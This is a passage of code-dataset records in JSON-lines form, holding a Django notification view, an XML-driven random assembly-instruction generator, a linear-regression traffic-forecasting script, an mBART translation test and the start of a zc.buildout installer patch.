request.user:\n            response_data[\"detail\"] = \"Nope!\"\n            return Response(response_data, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n        try:\n            ec_notification.delete()\n        except Exception as e:\n            response_data[\"detail\"] = \"Something went really wrong\"\n            return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n\n        response_data[\"success\"] = \"true\"\n        return Response(response_data, status=status.HTTP_200_OK)\n\n\nclass EpisodeCommentNotifications(generics.ListAPIView):\n    \"\"\"\n    Return the episode comment notifications for a given user\n    \"\"\"\n    permission_classes = [permissions.IsAuthenticated, ValidEmail]\n    serializer_class = EpisodeCommentNotificationList\n    pagination_class = EpisodeCommentNotificationPagination\n\n    def get_queryset(self):\n        query = EpisodeCommentNotification.objects.filter(user_notified=self.request.user)\n        return query\n","sub_path":"userfeatures/views/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"418069826","text":"import warnings\n\nimport xmltodict\nfrom random import randint, choice, uniform\n\nimport Constants\nfrom Constants import *\n\n\nclass Processor:\n    class __processorParser:\n        def __init__(self):\n            self.branchIndex = 0\n            # check if file exists\n            parse = self.fetch_xml_data(Constants.PATH_PROCESSOR)\n            self._setInstructionXML()\n            self.proc_infos = parse[PROCESSOR]\n\n            # Blocked registers\n            self._blocked_registers = []\n\n            # parse configurations from xml\n            # Set register\n            if isinstance(self.proc_infos[REGISTER_FILE], dict):\n                self.register = dict(self.proc_infos[REGISTER_FILE])\n                self.blockHardRegister()\n            else:\n                self.register = {}\n\n            # Set issue slots\n            if isinstance(self.proc_infos[ISSUE_SLOT], dict):\n                self.issue_slots = dict(self.proc_infos[ISSUE_SLOT])\n            else:\n                self.issue_slots = {}\n\n            # Set assembly structure\n            if isinstance(self.proc_infos[ASSEMBLY_STRUCTURE], dict):\n                self.assembly_structure = dict(self.proc_infos[ASSEMBLY_STRUCTURE])\n            else:\n                self.assembly_structure = {}\n\n            # Set immediate\n            if isinstance(self.proc_infos[IMMEDIATE], dict):\n                self.immediate = dict(self.proc_infos[IMMEDIATE])\n            else:\n                self.immediate = {}\n\n            # Set immediate operand\n            if isinstance(self.proc_infos[IMMEDIATE_OPERAND], dict):\n                self.immediate_operand = dict(self.proc_infos[IMMEDIATE_OPERAND])\n            else:\n                
self.immediate_operand = {}\n\n            # Set saturation\n            if isinstance(self.proc_infos[SATURATION], dict):\n                self.saturation = dict(self.proc_infos[SATURATION])\n            else:\n                self.saturation = {}\n\n            self.setMemoryRange()\n\n        def __getKeyValue(self, xmlDictionary, key):\n            value = xmlDictionary[key]\n            if value is None:\n                value = \"\"\n            return value\n\n\n        def setMemoryRange(self):\n            self.memory_description = {}\n            self.blockedMemoryAddresses = []\n            key = PROCESSOR_MEMORY_KEYWORD\n            if isinstance(self.proc_infos[key], dict):\n                # get start and end addresses\n                for memoryDescription in MEMORY_DESCRIPTION:\n                    if memoryDescription.value in self.proc_infos[key]:\n                        self.memory_description[memoryDescription.value] = int(self.proc_infos[key][memoryDescription.value])\n\n                # get formatting information\n                self.memory_description[FORMAT] = self.__getKeyValue(self.proc_infos[key], FORMAT)\n                for formating in FORMAT_DESCRIPTION:\n                    if formating.value in self.proc_infos[key]:\n                        value = self.__getKeyValue(self.proc_infos[key], formating.value)\n                        self.memory_description[formating.value] = value\n\n\n        def _setInstructionXML(self):\n            self.instructionXML = self.fetch_xml_data(PATH_INSTRUCTION)[INST_LIST]\n\n\n\n        def fetch_xml_data(self, dest: str):\n            with open(dest) as file:\n                xml_content = xmltodict.parse(file.read())\n            return xml_content\n\n        def blockHardRegister(self):\n            if BLOCKED_REGISTER in self.register:\n                for i in range(len(self.register[BLOCKED_REGISTER][REGISTER_FILE])):\n                    self._blocked_registers.append([int(self.register[BLOCKED_REGISTER][REGISTER_FILE][i]),\n                                                    int(self.register[BLOCKED_REGISTER][REGISTER][i])])\n\n        def getInstructionXML(self):\n            return self.instructionXML\n\n\n\n    instance = None\n\n    def __init__(self):\n        if not Processor.instance:\n            Processor.instance = Processor.__processorParser()\n\n    def describe_proc(self) -> str:\n        \"\"\"Helper function to read the parsed xml structure\"\"\"\n        for k, v in self.instance.__dict__.items():\n            print(\"%s: %s\" % (k, str(v)))\n\n    def parseInstruction(self, assembly: str) -> list:\n        \"\"\"return [instruction, registerString]\"\"\"\n        if isinstance(assembly, dict):\n            assembly = assembly['#text']\n\n        temp = assembly.split(\" \")\n        returnlist = []\n        instruction = temp.pop(0)\n        returnlist.append(instruction)\n        register = \" \".join(temp)\n        returnlist.append(register)\n        return returnlist\n\n    def getMandatoryFeatures(self, assembly):\n        if not isinstance(assembly, dict):\n            return {}\n        return assembly[MANDATORY_FEATURE]\n\n    # For Assembly\n    def get_instr_features(self, instruction: str) -> dict:\n        inst_xml = self.instance.getInstructionXML()\n        if instruction.lower() not in inst_xml:\n            return {}\n        inst = inst_xml[instruction.lower()]  # instruction xml keys are the instruction names in lower case\n\n        if instruction is None:\n            return self._getDefaultInstructionFeature(inst)\n        else:\n            return self.append_instr_feature(inst)\n\n    def _getDefaultInstructionFeature(self, inst):\n        attr_dict = {}\n        for key in inst:\n            print(key)\n            value = inst[key].split(DELIMITER_FEATURE) if inst[key] is not None else [None]\n            if key == ISSUE_SLOT:\n                value_update = []\n                for v in value:\n                    value_update.append(int(v))\n                value = value_update\n            attr_dict[key] = value\n\n\n        for attr_list in attr_dict.values():\n            for ind, value in enumerate(attr_list):\n                if value == '':\n                    attr_list[ind] = None\n\n        return attr_dict\n\n    def getFeatureValue(self, enabledFeature, instr_value) -> str:\n        if instr_value is None:\n            return\n        if enabledFeature == SIMD:\n            return self.instance.proc_infos[SIMD][instr_value]\n\n        if 
enabledFeature == SIGNAGE:\n if instr_value == SIGNED:\n return self.instance.proc_infos[SIGNAGE][SIGNED]\n if instr_value == UNSIGNED:\n return self.instance.proc_infos[SIGNAGE][UNSIGNED]\n\n if enabledFeature == CONDITIONAL:\n if instr_value == COND_SET:\n return self.instance.proc_infos[CONDITIONAL][COND_SET]\n if instr_value == COND_READ:\n return self.instance.proc_infos[CONDITIONAL][COND_READ]\n if instr_value == COND_READ_SET:\n return self.instance.proc_infos[CONDITIONAL][COND_READ_SET]\n\n if enabledFeature == SATURATION:\n if instr_value == PROCESSOR_DESCRIPTION_SATURATION.overflow.value:\n return self.instance.proc_infos[SATURATION][instr_value]\n if instr_value == PROCESSOR_DESCRIPTION_SATURATION.saturation.value:\n return self.instance.proc_infos[SATURATION][instr_value]\n\n if enabledFeature == IMMEDIATE:\n if instr_value in self.instance.proc_infos[IMMEDIATE]:\n return self.instance.proc_infos[IMMEDIATE][instr_value]\n\n\n def getFeature(self, key, index, instrStr:str = None):\n features = self.getAvailableInstructionFeatures(instrStr)\n try:\n return self.getAvailableInstructionFeatures(instrStr)[key][index]\n except:\n m=3\n\n def getAvailableInstructionFeatures(self, instruction: str =None) -> dict:\n \"\"\" return available features supported by the instruction\"\"\"\n if instruction is None:\n instr_attr = self.get_instr_features(INSTRUCTION_DEFAULT_MODES)\n else:\n instr_attr = self.get_instr_features(instruction)\n\n # Make all possible features\n # features = {}\n\n for enabledFeature in instructionFeatureList:\n if enabledFeature not in instr_attr:\n instr_attr[enabledFeature] = [None]\n # features[enabledFeature] = []\n # special case handling of features\n # if enabledFeature ==ISSUE_SLOT:\n # if DEFAULT in self.instance.issue_slots:\n # features[ISSUE_SLOT].append(self.instance.issue_slots[DEFAULT])\n # for i in range(int(self.instance.issue_slots[MAX_SIZE])):\n # features[ISSUE_SLOT].append(i)\n # else: # default handling of features\n # for value in self.instance.proc_infos[enabledFeature].values():\n # features[enabledFeature].append(value)\n\n for enabledFeature in instructionSpecialFeature: # For features that are instruction dependent\n if enabledFeature not in instr_attr:\n instr_attr[enabledFeature] = [None]\n\n # features[enabledFeature] = []\n # for value in instr_attr[enabledFeature]:\n # real_value = self.getFeatureValue(enabledFeature, value)\n # features[enabledFeature].append(real_value)\n\n return instr_attr\n\n def random_enabled_features(self, instruction, probability = 0) -> dict:\n \"\"\"set features to be randomized or not\"\"\"\n\n features = self.getAvailableInstructionFeatures(instruction)\n\n feature_stats = {}\n for key in features:\n feature_stats[key] = features[key][randint(0, len(features[key]) - 1)]\n\n if IMMEDIATE in features:\n if features[IMMEDIATE] != [None]:\n rand_prob = round(uniform(0, 1), 3)\n\n # special handling of immediate Feature\n if rand_prob <= probability:\n feature_stats[IMMEDIATE] = features[IMMEDIATE][-1]\n else:\n feature_stats[IMMEDIATE] = None\n else:\n feature_stats[IMMEDIATE] = None\n\n # warnings.warn(\"Condition is disabled for now!\")\n if CONDITIONAL in features:\n if len(features[CONDITIONAL]) > 1:\n conditionSelected = randint(0, len(features[CONDITIONAL]) - 1)\n conditionValue = self.getAssemlby2Feature(features[CONDITIONAL][conditionSelected])\n\n # todo: remove constraint\n if COND_SET == conditionValue:\n if instruction in TEMPORARY_CONDSEL_ENABLED:\n feature_stats[CONDITIONAL_READ] = \"zero\"\n 
feature_stats[SIMD] = \"8\"\n else:\n conditionSelected = None\n elif CONDITIONAL_READ == conditionValue:\n condition = randint(0, len(CONDITION_ELEMENTS) - 1)\n feature_stats[CONDITIONAL_READ] = CONDITION_ELEMENTS[condition]\n\n feature_stats[CONDITIONAL] = features[CONDITIONAL][conditionSelected]\n else:\n feature_stats[CONDITIONAL] = None\n\n\n # # todo: remove constraints\n # if instruction in TEMPORARY_CONDSEL_ENABLED:\n # conditionSelected = randint(0, len(features[CONDITIONAL])-1)\n # if \"CS\" == features[CONDITIONAL][conditionSelected]:\n # feature_stats[CONDITIONAL_READ] = \"zero\"\n # feature_stats[SIMD] = \"8\"\n # elif \"CR\" == features[CONDITIONAL][conditionSelected]:\n # condition = randint(0, len(CONDITION_ELEMENTS)-1)\n # feature_stats[CONDITIONAL_READ] = CONDITION_ELEMENTS[condition]\n # n=3\n # feature_stats[CONDITIONAL] = features[CONDITIONAL][conditionSelected]\n # else:\n # feature_stats[CONDITIONAL] = None\n else:\n n=3\n\n # TODO: remove this line, cond beschäftigen, jz immer noch falsch\n #feature_stats[CONDITIONAL] = 0\n return feature_stats\n\n def getInstructionAssemblyString(self, name, enabledFeatures) -> str:\n \"\"\"Get Assembly format in XML then write all features enabled.\"\"\"\n if not enabledFeatures:\n return name\n returnString = \"\"\n tempdict = {}\n\n # Write all features\n for key in self.instance.assembly_structure:\n if key in enabledFeatures:\n tempdict[key] = enabledFeatures[key]\n if INSTRUCTION in key:\n tempdict[key] = str(name)\n if SPACE in key:\n tempdict[key] = \" \"\n if CONDITIONAL_DELIMITER in key:\n tempdict[key] = \"\"\n\n # --Conditions--\n # For Issue slot\n if ISSUE_SLOT in tempdict:\n if isinstance(tempdict[ISSUE_SLOT], int):\n tempdict[ISSUE_SLOT] = ':' + str(tempdict[ISSUE_SLOT])\n elif not tempdict[ISSUE_SLOT]:\n tempdict[SPACE] = \"\"\n\n\n # If instruction already have _xx then dont put conditional things\n if ('_' in tempdict[INSTRUCTION]):\n tempdict[SIGNAGE] = \"\"\n tempdict[SIMD] = \"\"\n\n # For Conditional Delimiter\n tempdict_keys = list(tempdict.keys())\n temp = 0\n\n ## Find index of CONDITIONAL_DELIMITER\n for key in tempdict_keys:\n if key == CONDITIONAL_DELIMITER:\n temp = tempdict_keys.index(key)\n continue\n\n ## If after cond_delimiter there's no value then no '_'\n for key in tempdict_keys:\n index = tempdict_keys.index(key) if tempdict[key] else 0\n if index > temp:\n tempdict[CONDITIONAL_DELIMITER] = \"_\"\n\n # Add all dict to string then return\n for key in tempdict:\n if tempdict[key]:\n returnString += str(tempdict[key])\n\n return returnString\n\n # For Operands\n def get_register_rule(self) -> dict:\n # Get max register eigenschaft\n self.reg_features = {}\n\n # Make num reg files\n self.reg_features[NUM_REG_FILES] = int(self.instance.register[NUM_REG_FILES])-1\n\n # Make reg file size\n self.reg_features[REG_FILE_SIZE] = int(self.instance.register[REG_FILE_SIZE])-1\n\n # Make reg format\n self.reg_features[FORMAT] = self.instance.register[FORMAT]\n\n return self.reg_features\n\n def get_immediate_operand_rule(self) -> dict:\n return self.instance.immediate_operand\n\n def create_register_operand(self, bank: int = 0, register: int = 0) -> str:\n \"\"\"Create register string by modifying format str\"\"\"\n self.reg_format = self.get_register_rule()[FORMAT]\n self.reg_format = self.reg_format.replace('_regFile_', str(bank))\n self.reg_format = self.reg_format.replace('_register_', str(register))\n\n return self.reg_format\n\n def create_immediate_operand(self, value: int = 0, type: str = DEC) -> 
str:\n # Make immediate operand\n imm_rule = self.get_immediate_operand_rule()\n imm_format = imm_rule[FORMAT]\n\n # immediate type setting\n if imm_rule[type] == None:\n imm_type = ''\n else:\n imm_type = imm_rule[type]\n\n #convert value\n if type == DEC:\n imm_value = str(value)\n else:\n imm_value = self.convert_number(value, type)\n\n imm_format = imm_format.replace('_x_', str(imm_type))\n imm_format = imm_format + imm_value\n\n return imm_format\n\n def convert_number(self, value: int = 0, type: str = BIN) -> str:\n # value is always dec\n # Convert bin\n if type == BIN:\n return_value = '{:b}'.format(value)\n return return_value\n elif type == HEX:\n return_value = '{:x}'.format(value)\n return return_value\n else:\n #error\n return ERROR\n\n def getOperandTypes(self, operandstring: str, enabledfeatures: dict) -> dict:\n # Make dict of operand types.\n # Make dict of operand types.\n oplist = operandstring.split(', ')\n opdict = {key: OPERAND_TYPE.Register for key in oplist}\n if enabledfeatures[IMMEDIATE]:\n last = list(opdict)[-1]\n opdict[last] = OPERAND_TYPE.Immediate\n\n return opdict\n\n def getDefaultOperandType(self, enabledfeatures: dict) -> dict:\n # Make dict of operand types.\n opdict = {}\n for operand in OPERANDS:\n opdict[operand.value] = OPERAND_TYPE.Register\n\n # if enabledfeatures[IMMEDIATE]:\n opdict[OPERANDS.RAND_IMMEDIATE.value] = OPERAND_TYPE.Immediate\n\n # the ordering is important for the correct replacement strategy in assembly\n opdict[OPERANDS.ADDRESS4.value] = OPERAND_TYPE.Address4\n opdict[OPERANDS.ADDRESS3.value] = OPERAND_TYPE.Address3\n opdict[OPERANDS.ADDRESS2.value] = OPERAND_TYPE.Address2\n opdict[OPERANDS.ADDRESS.value] = OPERAND_TYPE.Address\n opdict[OPERANDS.BRANCH_INDEX.value] = OPERAND_TYPE.BRANCH_INDEX\n\n return opdict\n\n def generate_random_operand(self, type: str, enabledfeatures: dict, block: bool = False) -> str:\n # If type is register do:\n if type == OPERAND_TYPE.Register:\n max_reg_file = int(self.get_register_rule()[NUM_REG_FILES])\n max_reg_size = int(self.get_register_rule()[REG_FILE_SIZE])\n self.use_register = self.create_use_register(max_reg_file, max_reg_size)\n self.check = True\n while self.check:\n if self.use_register not in self.instance._blocked_registers:\n if block:\n self.instance._blocked_registers.append(self.use_register)\n self.check = False\n self.reg_operand = self.create_register_operand(bank= self.use_register[0],\n register= self.use_register[1])\n return self.reg_operand\n else:\n self.use_register = self.create_use_register(max_reg_file, max_reg_size)\n\n # If type is immediate do:\n elif type == OPERAND_TYPE.Immediate:\n return self.create_rand_immediate(enabledfeatures)\n elif type == OPERANDS.ADDRESS:\n return self.createRandomMemoryAddress()\n\n def createRandomMemoryAddress(self):\n start =0\n end = DEFAULT_MAX_MEMORY_ADDRESS\n if MEMORY_DESCRIPTION.startAddress.value in self.instance.memory_description:\n start = self.instance.memory_description[MEMORY_DESCRIPTION.startAddress.value]\n if MEMORY_DESCRIPTION.endAddress.value in self.instance.memory_description:\n end = self.instance.memory_description[MEMORY_DESCRIPTION.endAddress.value]\n elements = list(range(start, end))\n for blocked in self.instance.blockedMemoryAddresses:\n elements.remove(blocked)\n address = choice(elements)\n self.instance.blockedMemoryAddresses.append(address)\n return address\n\n def removeMemoryAddress(self, memoryAddress):\n self.instance.blockedMemoryAddresses.remove(memoryAddress)\n\n def get_operands_string(self, 
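# editor's note (hypothetical example): a call such as\n            # get_operands_string(\"opA, opB\", feats) with the IMMEDIATE feature enabled\n            # may yield \"R0.3, 0x1a\" -- every symbolic operand is replaced by a randomly\n            # generated register, and the last one by an immediate.\n            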
operandstrings: str, enabledfeatures: dict) -> str:\n # Make random operand\n self.reg_features = self.get_register_rule()\n self.imm_features = self.get_immediate_operand_rule()\n optypes = self.getOperandTypes(operandstrings, enabledfeatures)\n\n # Make Operands\n oplist = [self.generate_random_operand(typ, enabledfeatures) for typ in optypes]\n\n\n returnstring = \", \".join(oplist)\n return returnstring\n\n def generateRandomOperands(self, enabledfeatures, generateFocusRegister=True, FocusRegister=None):\n operands = self.getDefaultOperandType(enabledfeatures)\n # special case Handling of Rand Value\n if generateFocusRegister:\n operands[OPERANDS.FOCUS_REGISTER.value] = self.generateRandomOperand(operands[OPERANDS.FOCUS_REGISTER.value], enabledfeatures, block=True)\n operands[RAND_VALUE] = self.generateRandomOperand(operands[RAND_VALUE], enabledfeatures, block=True)\n for key in operands:\n block = False\n if not generateFocusRegister and OPERANDS.FOCUS_REGISTER.value == key:\n continue\n if generateFocusRegister and OPERANDS.FOCUS_REGISTER.value == key:\n # block first focus register of interleaving sequence\n continue\n\n if key == RAND_VALUE:\n continue\n operands[key] = self.generateRandomOperand(operands[key], enabledfeatures, block=block)\n while self.isRegisterConflict(operands, FocusRegister):\n operands[RAND_VALUE] = self.generateRandomOperand(OPERAND_TYPE.Register, enabledfeatures, block=True)\n operands[OPERANDS.TARGET_REGISTER.value] = self.generateRandomOperand(OPERAND_TYPE.Register, enabledfeatures, block=False)\n return operands\n\n def isRegisterConflict(self, operands, FocusRegister=None):\n value = (FocusRegister == operands[RAND_VALUE]) or (FocusRegister == operands[OPERANDS.TARGET_REGISTER.value])\n return value\n\n def generateRandomOperand(self, type, enabledFeatures, block=False):\n # If type is register do:\n if type == OPERAND_TYPE.Register:\n max_reg_file = int(self.get_register_rule()[NUM_REG_FILES])\n max_reg_size = int(self.get_register_rule()[REG_FILE_SIZE])\n use_register = self.create_use_register(max_reg_file, max_reg_size)\n self.check = True\n while self.check:\n if use_register not in self.instance._blocked_registers:\n if block:\n self.instance._blocked_registers.append(use_register)\n self.check = False\n reg_operand = self.create_register_operand(bank=use_register[0],\n register=use_register[1])\n\n return reg_operand\n else:\n use_register = self.create_use_register(max_reg_file, max_reg_size)\n\n # If type is immediate do:\n elif type == OPERAND_TYPE.Immediate:\n return self.create_rand_immediate(enabledFeatures)\n elif type == OPERAND_TYPE.Address:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.Address2:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.Address3:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.Address4:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.BRANCH_INDEX:\n self.instance.branchIndex +=1\n return self.instance.branchIndex\n\n def getOperandAssembly(self, operandString :str, operandAttributes: dict, overridingTargetRegister=None, isPragma=False, isRandValueRandomImmediate=False):\n \"\"\"\n\n :param operandString:\n :param operandAttributes:\n :param overridingTargetRegister:\n :param isPragma:\n :param isRandValueRandomImmediate: Only modifying operation needs to replace randValue with Immidiate, other is false\n :return:\n \"\"\"\n operandParts = operandString.replace(\",\", \"\").split(\" \")\n operandParts = [str(i) for i in 
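# editor's note: the loop below swaps each symbolic operand token for its\n        # concrete value; composite tokens that survive are resolved afterwards by\n        # replacePartialOperands().\n        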
operandParts]\n        for operand, value in operandAttributes.items():\n            if operand == TARGET_REGISTER:\n                if overridingTargetRegister is not None:\n                    value = overridingTargetRegister\n\n            if isRandValueRandomImmediate and operand == RAND_VALUE:\n                value = operandAttributes[OPERANDS.RAND_IMMEDIATE.value]\n\n            if operand == OPERANDS.RAND_IMMEDIATE.value:\n                value = operandAttributes[OPERANDS.RAND_IMMEDIATE.value]\n\n            while operand in operandParts:\n                index = operandParts.index(operand)\n                operandParts[index] = str(value)\n\n            operandString = operandString.replace(operand, str(value))\n\n        if isPragma:\n            operandResult = \" \".join(operandParts)\n        else:\n            operandResult = \", \".join(operandParts)\n\n        operandResult = self.replacePartialOperands(operandResult, operandAttributes)\n\n        return operandResult\n\n    def generate_ComparisonCode(self, instr_list: list, focusInstruction, targetInstruction) -> str:\n        comparison_code = ''\n        for instr in instr_list:\n            instr = instr.replace(FOCUS_REGISTER, focusInstruction.getFocusOperand())\n            instr = instr.replace(TARGET_REGISTER, targetInstruction.getTargetOperand())\n            comparison_code += str(instr)\n            comparison_code += '\\n'\n        return comparison_code\n\n\n\n    def replacePartialOperands(self, operandResult, operandAttributes):\n        if operandAttributes:\n\n            for keyword in ASSEMBLY_PARTIAL:\n                if keyword.value in operandResult:\n                    operandValue = str(operandAttributes[keyword.value])\n                    operandResult = operandResult.replace(keyword.value, operandValue)\n\n        return operandResult\n\n    def isPragma(self, instructionString):\n        for keyword in ASSEMBLY_PRAGMAS:\n            if keyword.value in instructionString:\n                return True\n        return False\n\n    def create_use_register(self, max_reg_file, max_reg_size):\n        return [randint(0, max_reg_file), randint(0, max_reg_size)]\n\n    def create_rand_immediate(self, enabledfeatures):\n        immediate_String = enabledfeatures[IMMEDIATE]\n        return self.createRandImmediate(immediate_String)\n\n    def createRandImmediate(self, immediateString):\n        # try:\n        #     immediateString = Processor().getAvailableInstructionFeatures()[IMMEDIATE][immediateString]\n        # except:\n        #     n=3\n        imm_type = PROCESSOR_DESCRIPTION_IMMEDIATE.short.value  # default in case no match is found below\n        for k, v in self.instance.immediate.items():\n            if v == immediateString:\n                if k == DEFAULT:\n                    imm_type = PROCESSOR_DESCRIPTION_IMMEDIATE.short.value\n                else:\n                    imm_type = k\n\n\n        max_value = int(self.get_immediate_operand_rule()[imm_type])\n        val = randint(0, max_value)\n        imm_basis = HEX\n        reg_operand = self.create_immediate_operand(val, imm_basis)\n        return reg_operand\n\n    def append_instr_feature(self, inst):\n        attr_dict = {}\n        for feature in instructionFeatureList:\n            if feature in inst:\n                attr_dict[feature] = inst[feature].split(DELIMITER_FEATURE) if inst[feature] is not None else [None]\n            else:\n                attr_dict[feature] = [None]\n\n        for feature in instructionSpecialFeature:\n            if feature in inst:\n                attr_dict[feature] = inst[feature].split(DELIMITER_FEATURE) if inst[feature] is not None else [None]\n            else:\n                attr_dict[feature] = [None]\n\n\n        for attr_list in attr_dict.values():\n            for ind, value in enumerate(attr_list):\n                if value == '':\n                    attr_list[ind] = None\n\n        feature = {}\n        # convert value to Assembly\n        for key in attr_dict:\n            feature[key] = []\n            for value in attr_dict[key]:\n                if value == 'None' or value is None:\n                    feature[key].append(None)\n                else:\n                    try:\n                        feature[key].append(self.instance.proc_infos[key][value])\n                    except Exception:\n                        pass  # value is not described in the processor xml; skip it\n\n        return feature\n\n    def getRandomIssueSlot(self):\n        return randint(0, int(self.instance.issue_slots[MAX_SIZE]))\n\n    def getBlockedRegister(self):\n        return self.instance._blocked_registers\n\n    def getSIMD(self):\n        return self.instance.proc_infos[SIMD]\n\n    def resetBlockedRegister(self):\n        self.instance._blocked_registers = []\n        self.instance.blockHardRegister()\n\n    def resetBranchIndex(self):\n        self.instance.branchIndex = 0\n\n    def reset(self):\n        self.resetBlockedRegister()\n        self.resetBranchIndex()\n        self.instance.blockedMemoryAddresses = []\n\n    def getProcessorFeatureAssembly(self, feature, value):\n        # if feature == CONDITIONAL:\n        #     return self.instance.proc_infos[CONDITIONAL_VALUES][value]\n        assembly = self.instance.proc_infos[feature][value]\n        if not assembly:\n            return value\n        else:\n            return assembly\n\n\n\n    def getProcessorFeatureList(self, feature):\n        return self.instance.proc_infos[feature]\n\n    def getAssemlby2Feature(self, assembly):\n\n        if assembly:\n\n            for instrFeature in instructionSpecialFeature:\n                for key, value in self.instance.proc_infos[instrFeature].items():\n                    if value:\n                        if assembly in value:\n                            return key\n\n\n            for instrFeature in instructionFeatureList:\n                for key, value in self.instance.proc_infos[instrFeature].items():\n                    if assembly in key:\n                        return value\n        else:\n            return None\n\n\n","sub_path":"util/Processor.py","file_name":"Processor.py","file_ext":"py","file_size_in_byte":29153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"487249528","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Nan Ji\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport glob\r\nimport time\r\nimport warnings\r\nfrom preprocess import DataPreprocess\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.multioutput import MultiOutputRegressor\r\n\r\nwarnings.filterwarnings('ignore')\r\n\r\ndp = DataPreprocess(inputstep=6,predstep=4)\r\ninputstep = dp.inputstep\r\npredstep = dp.predstep\r\nmaxv = dp.maxv\r\nlink = 257\r\n\r\nprint('loading and partitioning dataset...')\r\nhplist = glob.glob(r'E:/gongtiS/Data/NormalTarget/*csv')[30:47] #July 01-16\r\n#vplist = glob.glob(r'E:/gongtiS/Data/NormalTarget/*csv')[47:55] #July 17-24\r\ntplist = glob.glob(r'E:/gongtiS/Data/NormalTarget/*csv')[55:62] #July 25-31\r\nhist = [pd.read_csv(i,header=None).to_numpy() for i in hplist] #historical dataset (as_matrix was removed from pandas)\r\n#vali = [pd.read_csv(i,header=None).to_numpy() for i in vplist] #validation dataset\r\ntest = [pd.read_csv(i,header=None).to_numpy() for i in tplist] #test dataset\r\n\r\nprint('preprocessing training data...')\r\ntrainX,trainY,trainY_nofilt = dp.predata(hist)\r\n\r\nmlr = LinearRegression()\r\nprint('model training on trainX...')\r\nstart = time.time()\r\nmlr.fit(trainX.reshape(trainX.shape[0],trainX.shape[1]*trainX.shape[2]),trainY)\r\nend = time.time()\r\n\r\ntrainX, trainY, trainY_nofilt = [], [], []\r\n\r\nprint('preprocessing testing data...')\r\ntestX,testY,testY_nofilt = dp.predata(test)\r\n\r\nprint('#####model predicting on testX...#####')\r\npredY = mlr.predict(testX.reshape(testX.shape[0],testX.shape[1]*testX.shape[2]))\r\n\r\nMAE = np.mean(np.abs(np.asarray(predY).reshape(-1, link) * maxv - np.asarray(testY_nofilt).reshape(-1, link) * maxv))\r\nMAPE = np.mean(np.abs(np.asarray(predY).reshape(-1, link) - np.asarray(testY_nofilt).reshape(-1, link)) / np.asarray(testY_nofilt).reshape(-1, link))\r\nprint('running time:', (end - start))\r\nprint('inputstep=%d' % inputstep)\r\nprint('predstep=%d' % predstep)\r\nprint('MAE:%.4f' % MAE)\r\nprint('MAPE:%.4f%%' % (MAPE * 100))\r\n\r\npd.DataFrame((np.asarray(predY).reshape(-1, 
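# editor's note: predY is on the normalised scale produced by DataPreprocess\r\n# (note the \"* maxv\" in the MAE computation above), so it is multiplied by maxv\r\n# here to restore the original value range before saving\r\n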
link) * maxv), columns=None).to_csv(\r\n    r'F:/[磕盐]服务器/NanJi/response/LR-prep%dp%d.csv' % (inputstep, predstep), header=None, columns=None)\r\nwith open(r'F:/[磕盐]服务器/NanJi/response/log-LR.txt', 'a') as f:\r\n    f.write('\\ninputstep=%d,predstep=%d,MAE=%.4f,MAPE=%.4f' % (inputstep, predstep, MAE, (MAPE * 100)))\r\n\r\ntestX, testY, testY_nofilt, predY = [], [], [], []\r\n\r\n","sub_path":"mlr.py","file_name":"mlr.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"176984500","text":"from transformers import AutoTokenizer\nfrom transformers import AutoModelForSeq2SeqLM\nimport torch\n\ndef main():\n    output_dir = 'enro_finetune_mbart01'\n    model_dir = f'{output_dir}/best_tfmr'\n    model = AutoModelForSeq2SeqLM.from_pretrained(model_dir)\n    tokenizer = AutoTokenizer.from_pretrained(model_dir)\n\n    src_txt = ['Some of that money was allegedly funneled back to campaign coffers of the ruling party and its allies.', \n               'According to prosecutors, the scheme at Petrobras involved roughly $2 billion in bribes and other illegal funds.']\n    for text in src_txt:\n        print(f'src: {text}')\n        input_ids = torch.tensor(tokenizer.encode(text, add_special_tokens=True)).unsqueeze(0)\n        generated = model.generate(input_ids)\n        gen_txt = [tokenizer.decode(t, skip_special_tokens=True) for t in generated]\n        print(f'trans: {gen_txt}')\n\nif __name__ == '__main__':\n    main()","sub_path":"examples/seq2seq/try_translation_enro.py","file_name":"try_translation_enro.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"45188264","text":"\"\"\"A monkey patch to zc.buildout.easy_install.develop that takes into\nconsideration eggs installed at both development and deployment directories.\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport tempfile\nimport subprocess\nimport pkg_resources\nimport setuptools.command.setopt\nimport zc.buildout.easy_install\n\nfrom . 
import tools\nfrom .envwrapper import EnvironmentWrapper\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nrunsetup_template = \"\"\"\nimport os\nimport sys\nfor k in %(paths)r.split(os.pathsep): sys.path.insert(0, k)\nsys.path.insert(0, %(setupdir)r)\n\nimport os, setuptools\n\n__file__ = %(__file__)r\n\nos.chdir(%(setupdir)r)\nsys.argv[0] = %(setup)r\n\nexec(compile(open(%(setup)r).read(), %(setup)r, 'exec'))\n\"\"\"\n\nclass Installer:\n\n def __init__(self, buildout):\n\n self.buildout = buildout['buildout']\n\n self.verbose = tools.verbose(self.buildout)\n\n # finally builds the environment wrapper\n self.prefixes = tools.get_prefixes(self.buildout)\n self.envwrapper = EnvironmentWrapper(logger,\n tools.debug(self.buildout),\n self.prefixes,\n buildout.get('environ', {}),\n )\n\n self.find_links = buildout.get('find_links', '')\n\n def __call__(self, spec, ws, dest, dist):\n \"\"\"We will replace the default easy_install call by this one\"\"\"\n\n # set the environment\n self.envwrapper.set()\n\n # satisfy all package requirements before installing the package itself\n tools.satisfy_requirements(self.buildout, spec, ws)\n\n tmp = 